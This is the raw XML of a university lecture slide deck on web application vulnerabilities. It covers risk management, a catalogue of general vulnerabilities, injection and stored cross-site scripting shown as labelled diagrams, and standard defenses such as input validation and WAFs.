              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045937" y="4790006"/>
            <a:ext cx="301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Script sends data to attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8996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Persistent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Vulnerability</a:t>
            </a:r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EE7AC07-2CA6-4726-9F4A-4073DABA9C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473443" y="2550517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Malicious code ends up on the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Common where the code is put in a database (a POST) for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Comment Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Submission Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Contact Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Query Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Data Uploads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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCAB51F-C550-4C85-BB24-17108D5C0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72" y="4719942"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B652BC-6D07-43FE-A8E2-47824E39A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70" y="2115451"/>
            <a:ext cx="1574751" cy="10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71A795D2-7FE7-4AB0-BEA1-1A9405D5CC4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677487" y="6304592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ATTACKER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30558A-3EBF-4607-8541-1A2ABE1D6C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2687170" y="3307404"/>
            <a:ext cx="716437" cy="1282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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12BAD2D-71AC-4BAD-BABB-CBC037AD4C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533432" y="3558284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Submits script to database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDA796C-1B98-4652-9F5B-08C65EA4D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521" y="1593035"/>
            <a:ext cx="985690" cy="104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05B07C-677E-4608-923D-CCB9DE488769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3094454" y="3024599"/>
            <a:ext cx="1817442" cy="1695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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB9F1B9-3B8E-4E8A-A55C-4C2303022EAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126069" y="3616432"/>
            <a:ext cx="1820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 accepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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22110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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCAB51F-C550-4C85-BB24-17108D5C0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12" y="4508645"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B652BC-6D07-43FE-A8E2-47824E39A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10" y="1904154"/>
            <a:ext cx="1574751" cy="10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71A795D2-7FE7-4AB0-BEA1-1A9405D5CC4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390327" y="6093295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ATTACKER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30558A-3EBF-4607-8541-1A2ABE1D6C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3116447" y="3096108"/>
            <a:ext cx="3421930" cy="183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Database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDA796C-1B98-4652-9F5B-08C65EA4D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61" y="1381738"/>
            <a:ext cx="985690" cy="104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omputer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA8B02F-B03E-4BA7-9E40-0128F0374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48" y="4459956"/>
            <a:ext cx="1935054" cy="14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12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A71C5B-DBF8-4472-A98B-8FE603C0E3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401957" y="5972168"/>
            <a:ext cx="8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VICTIM</a:t>
            </a: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103772FA-5E13-45E3-AFC2-464F451B1211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887361" y="4123628"/>
            <a:ext cx="122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Interacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application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CFAD9C-4442-4D01-B7D9-EF4B044223E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624736" y="2426569"/>
            <a:ext cx="2149311" cy="2082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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{070A0FE8-4E1C-461A-822C-C43D96D6C92D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699391" y="2703191"/>
            <a:ext cx="2604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Database-stored script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is downloaded and ran by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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17416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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCAB51F-C550-4C85-BB24-17108D5C0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6" y="4554611"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B652BC-6D07-43FE-A8E2-47824E39A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54" y="1950120"/>
            <a:ext cx="1574751" cy="10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id="{71A795D2-7FE7-4AB0-BEA1-1A9405D5CC4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389371" y="6139261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ATTACKER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30558A-3EBF-4607-8541-1A2ABE1D6C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2806338" y="4980300"/>
            <a:ext cx="3731083" cy="575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Database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDA796C-1B98-4652-9F5B-08C65EA4D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405" y="1427704"/>
            <a:ext cx="985690" cy="104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computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA8B02F-B03E-4BA7-9E40-0128F0374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92" y="4505922"/>
            <a:ext cx="1935054" cy="14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12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A71C5B-DBF8-4472-A98B-8FE603C0E3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401001" y="6018134"/>
            <a:ext cx="8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VICTIM</a:t>
            </a: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103772FA-5E13-45E3-AFC2-464F451B1211}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296920" y="4659193"/>
            <a:ext cx="1575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is sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41045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What is a fundamental defense that coders can apply to address injection and XSS attacks?</a:t>
            </a:r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Filter data (input validation controls)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Consider input as text (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0"/>
              <a:t> vs text)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Browser defenses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WAF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Defenses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Identify and Inventory the Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Identify Threats and Vulnerabilities and Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Identify and Measure Risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Prioritize Risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Identify Control Objectives to Mitigate Priority </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>RIsks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Apply Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Measure Efficacy of the Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Repeat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Lifecycle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0" y="2729345"/>
            <a:ext cx="2549236" cy="512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b="0" dirty="0"/>
              <a:t>Complicated user interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Default passwords not changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Disposal of storage media without deleting data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Equipment sensitivity to changes in voltage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Equipment sensitivity to moisture and contaminants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Equipment sensitivity to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" smtClean="0"/>
              <a:t>temperature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate cabling security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate capacity management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate change management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate classification of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate control of physical access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate maintenance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b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Different Vulnerabilities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b="0" dirty="0"/>
              <a:t>Inadequate network management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate or irregular backup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate password management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate physical protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate protection of cryptographic keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate replacement of older equipment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate security awareness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate segregation of duties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate segregation of operational and testing facilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate supervision of employees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate supervision of vendors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Inadequate training of employees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Incomplete specification for software development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b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Different Vulnerabilities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b="0" dirty="0"/>
              <a:t>Insufficient software testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of access control policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of clean desk and clear screen policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of control over the input and output data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of internal documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of or poor implementation of internal audit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of policy for the use of cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of procedure for removing access rights upon termination of employment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of protection for mobile equipment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lack of redundancy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of systems for identification and authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Lack of validation of the processed data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b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Different Vulnerabilities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b="0" dirty="0"/>
              <a:t>Location vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>natural disaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Poor selection of test data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Single copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Too much power in one person</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Uncontrolled copying of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Uncontrolled download from the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Uncontrolled use of information systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Undocumented software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Unmotivated employees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Unprotected public network connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>User rights are not reviewed regularly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b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Different Vulnerabilities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Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Data Storage and Transmission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>System Configuration (hardware, OS, infrastructure)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Coding (applications, services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Nonrepudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Physical environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b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Catalog of Different Vulnerabilities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Outside of User and Physical, the most predominant vulnerability type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why??????</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b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Catalog of Different Vulnerabilities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</TotalTime>
  <Words>1040</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>211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Web Application Vulnerabilities                      CSS310 – Spring 2021 Lesson 5</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>Risk Management Lifecycle</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Application Vulnerabilities</vt:lpstr>
      <vt:lpstr>2017 Top 10 in OWASP</vt:lpstr>
      <vt:lpstr>Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Injection Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting Vulnerability</vt:lpstr>
      <vt:lpstr>Defense?</vt:lpstr>
      <vt:lpstr>Standard Defenses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William Lidster</cp:lastModifiedBy>
  <cp:revision>179</cp:revision>
  <cp:lastPrinted>2016-02-10T20:19:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-10-14T00:51:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-12T23:50:10Z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5352e74-27b2-43e6-a9fe-6ab14f4a88a7_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_SetDate">
    <vt:lpwstr>2021-04-12T22:38:34Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_Name">
    <vt:lpwstr>Personal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_SiteId">
    <vt:lpwstr>00c076e3-22c6-4e48-a725-70fd7e4cb6eb</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_ActionId">
    <vt:lpwstr>37cbcbf7-ab05-4387-94f4-1d1a0f778413</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_b5352e74-27b2-43e6-a9fe-6ab14f4a88a7_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>